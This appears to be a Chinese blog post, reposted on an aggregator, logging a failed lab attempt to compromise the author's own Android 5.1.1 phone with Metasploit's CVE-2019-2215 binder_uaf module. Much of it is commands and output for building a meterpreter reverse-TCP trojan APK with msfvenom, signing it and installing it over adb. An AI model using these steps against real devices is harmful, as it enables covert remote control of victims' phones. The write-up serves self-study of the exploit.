1. 前言

最近想利用metasploit對手機進行依次滲透實驗。

通過查看最近三年的安卓漏洞，我對CVE-2019-2215這個漏洞很感興趣。

幸運的是，metasploit里就有這個漏洞的攻擊payload，于是我就開始試試了。

msf6 > search binder

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/android/local/binder_uaf  2019-09-26       excellent  No     Android Binder Use-After-Free Exploit


Interact with a module by name or index. For example info 0, use 0 or use exploit/android/local/binder_uaf

在環(huán)境的準備中，你需要有一個kali環(huán)境。可以參考我的這篇博客：

5分鐘完成 Kali linux安裝（基于VirtualBox）_virtualbox安裝kali_曉翔仔的博客-CSDN博客

一個被測手機和kali在同一個局域網(wǎng)里（連接同一個wifi）：

┌──(root?kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:22:46:4f, IPv4: 192.168.2.119
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.1     28:77:77:05:f2:48       (Unknown)
192.168.2.2     60:23:a4:29:04:57       Sichuan?AI-Link?Technology?Co.,?Ltd.
192.168.2.6     f2:f9:15:96:35:37       (Unknown: locally administered)
192.168.2.109   88:d8:2e:f3:fa:11       (Unknown)
192.168.2.122   d0:5b:a8:f5:b6:2b       zte corporation
192.168.2.128   62:e8:cb:7c:2d:b6       (Unknown: locally administered)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 6 responded

倒數(shù)第二行就是我的中興手機

當然，你需要檢查手機安卓的版本，已經(jīng)只有該漏洞修復(fù)前的版本才有成功利用的理論可。

?安卓版本5.1.1，很好，這個手機的操作系統(tǒng)足夠古老，可以用作試驗機。

2. 制作木馬apk

2.1 使用?msfvenom制作apk

這里的ip用kali的ip。

┌──(kali?kali)-[~]
└─$ sudo msfconsole
[sudo] password for kali: 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true
Metasploit Documentation: https://docs.metasploit.com/

msf6 > msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.119 LPORT=4443 R >Androidzyy1.apk
[*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.119 LPORT=4443 R >Androidzyy1.apk

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10236 bytes

2.2 安裝并使用zipalign給apk對齊優(yōu)化

┌──(root?kali)-[/home/kali]
└─# zipalign 
Command 'zipalign' not found, but can be installed with:
apt install zipalign
Do you want to install it? (N/y)y
apt install zipalign
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  ruby3.0 ruby3.0-dev ruby3.0-doc
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libutils android-libziparchive libzopfli1
The following NEW packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libutils android-libziparchive libzopfli1 zipalign
0 upgraded, 8 newly installed, 0 to remove and 1755 not upgraded.
Need to get 479 kB of archives.
After this operation, 1,689 kB of additional disk space will be used.
Do you want to continue? [Y/n] y

......

Unpacking zipalign (1:10.0.0+r36-1) ...
Setting up android-liblog:amd64 (1:29.0.6-26) ...
Setting up libzopfli1 (1.0.3-1) ...
Setting up android-libbase:amd64 (1:29.0.6-26) ...
Setting up android-libziparchive:amd64 (1:29.0.6-26) ...
Setting up android-libcutils:amd64 (1:29.0.6-26) ...
Setting up android-libbacktrace:amd64 (1:29.0.6-26) ...
Setting up android-libutils:amd64 (1:29.0.6-26) ...
Setting up zipalign (1:10.0.0+r36-1) ...
Processing triggers for libc-bin (2.36-8) ...
Processing triggers for man-db (2.10.2-1) ...
Processing triggers for kali-menu (2022.3.1) ...


┌──(kali?kali)-[~]
└─$ zipalign -v 4 Androidzyy1.apk GRIT.apk
Verifying alignment of GRIT.apk (4)...
      49 AndroidManifest.xml (OK - compressed)
    1828 resources.arsc (OK - compressed)
    2041 classes.dex (OK - compressed)
    8208 META-INF/ (OK)
    8258 META-INF/MANIFEST.MF (OK - compressed)
    8495 META-INF/SIGNFILE.SF (OK - compressed)
    8758 META-INF/SIGNFILE.RSA (OK - compressed)
Verification successful

┌──(kali?kali)-[~]
└─$ ls -l | grep apk
-rw-r--r-- 1 root root 10236 Feb 25 05:26 Androidzyy1.apk
-rw-r--r-- 1 kali kali 10236 Feb 25 22:17 GRIT.apk

2.3 生成密鑰對

使用keytool工具生成密鑰對。參數(shù)解釋：

-alias 產(chǎn)生別名（zzh）
-keystore 指定密鑰庫的名稱(就像數(shù)據(jù)庫一樣的證書庫，可以有很多個證書，cacerts這個文件是jre自帶的，你也可以使用其它文件名字，如果沒有這個文件名字，它會創(chuàng)建這樣一個這里為zzh.keystore)
-v 顯示密鑰庫中的證書詳細信息
-validity 指定創(chuàng)建的證書有效期多少天(365)
-keysize 指定密鑰長度(2084)

-keyalg RSA(算法)

執(zhí)行結(jié)果：

┌──(kali?kali)-[~]
└─$ keytool -genkey -v -keystore zyy.keystore -alias zyy -keyalg RSA -keysize 2084 -validity 365
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  zyy
What is the name of your organizational unit?
  [Unknown]:  person
What is the name of your organization?
  [Unknown]:  person
What is the name of your City or Locality?
  [Unknown]:  nanjinng
What is the name of your State or Province?
  [Unknown]:  jiangsu
What is the two-letter country code for this unit?
  [Unknown]:  86
Is CN=zyy, OU=person, O=person, L=nanjinng, ST=jiangsu, C=86 correct?
  [no]:  y

Generating 2,084 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 days
        for: CN=zyy, OU=person, O=person, L=nanjinng, ST=jiangsu, C=86
[Storing zyy.keystore]

2.4 下載apksigner工具并簽名

┌──(kali?kali)-[~]
└─$ apksigner  
Command 'apksigner' not found, but can be installed with:
sudo apt install apksigner
Do you want to install it? (N/y)y
sudo apt install apksigner
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  ruby3.0 ruby3.0-dev ruby3.0-doc
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  libapksig-java
The following NEW packages will be installed:
  apksigner libapksig-java
0 upgraded, 2 newly installed, 0 to remove and 1755 not upgraded.
Need to get 847 kB of archives.
After this operation, 980 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]
Fetched 847 kB in 3s (303 kB/s)
Selecting previously unselected package libapksig-java.
(Reading database ... 354811 files and directories currently installed.)
Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...
Unpacking libapksig-java (31.0.2-1) ...
Selecting previously unselected package apksigner.
Preparing to unpack .../apksigner_31.0.2-1_all.deb ...
Unpacking apksigner (31.0.2-1) ...
Setting up libapksig-java (31.0.2-1) ...
Setting up apksigner (31.0.2-1) ...
Processing triggers for kali-menu (2022.3.1) ...
Processing triggers for man-db (2.10.2-1) ...


┌──(kali?kali)-[~]
└─$ apksigner sign --ks zyy.keystore --ks-key-alias zyy GRIT.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Keystore password for signer #1: 


┌──(kali?kali)-[~]
└─$ ls -l | grep apk
-rw-r--r-- 1 root root 10236 Feb 25 05:26 Androidzyy1.apk
-rw-r--r-- 1 kali kali 16777 Feb 25 22:30 GRIT.apk
-rw-r--r-- 1 kali kali  5652 Feb 25 22:30 GRIT.apk.idsig

2.5將APK傳入手機安裝

D:\softwarework\platform-tools_r31.0.3-windows\platform-tools>adb install GRIT.apk
Performing Push Install
GRIT.apk: 1 file pushed, 0 skipped. 78.6 MB/s (16777 bytes in 0.000s)
        pkg: /data/local/tmp/GRIT.apk
Success

3. msf console運行滲透腳本

3.1 從MSF搜索該漏洞利用腳本

msf6 > search binder

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/android/local/binder_uaf  2019-09-26       excellent  No     Android Binder Use-After-Free Exploit


Interact with a module by name or index. For example info 0, use 0 or use exploit/android/local/binder_uaf

msf6 > use 0
[*] Using configured payload linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(android/local/binder_uaf) > show options

Module options (exploit/android/local/binder_uaf):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

3.2 設(shè)置options,這里的LHOST填kali的IP

msf6 exploit(android/local/binder_uaf) > set LPORT 4443
LPORT => 4443
msf6 exploit(android/local/binder_uaf) > set LHOST 192.168.2.119
LHOST => 192.168.2.119

3.3 運行漏洞利用腳本

運行前需要點擊手機上的應(yīng)用圖標，讓木馬運行起來。

然后我在手機上安裝的木馬應(yīng)用，毫無反應(yīng)。

由于SESSION無法建立，漏洞利用失??！

msf6 exploit(android/local/binder_uaf) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION
[*] Exploit completed, but no session was created.

4.最后

需要查找原因文章來源地址http://www.zghlxwxcb.cn/news/detail-485571.html

到了這里，關(guān)于MSF手機滲透實驗(未成功)（CVE-2019-2215 Binder UA）的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！